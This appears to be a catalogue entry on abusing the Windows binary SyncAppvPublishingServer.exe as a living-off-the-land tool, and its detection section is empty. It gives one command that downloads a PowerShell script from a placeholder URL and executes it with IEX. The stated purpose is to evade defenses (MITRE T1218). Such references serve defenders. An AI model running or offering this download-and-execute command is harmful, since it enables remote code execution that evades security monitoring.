.. /SyncAppvPublishingServer.exe
Star

Used by App-v to get App-v server lists


Paths:

Resources:
Acknowledgements:

Detection:

Execute

Example command on how inject Powershell code into the process
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
Privileges required: User
OS: Windows 10 1709, Windows 10 1703, Windows 10 1607
MITRE ATT&CK®: T1218